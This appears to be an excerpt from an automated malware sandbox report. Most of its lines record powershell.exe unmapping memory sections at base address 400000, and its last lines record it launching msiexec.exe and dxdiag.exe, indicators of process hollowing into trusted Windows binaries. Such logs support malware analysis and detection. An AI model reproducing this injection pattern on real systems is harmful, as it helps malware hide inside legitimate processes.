Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\System32\SIHClient.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
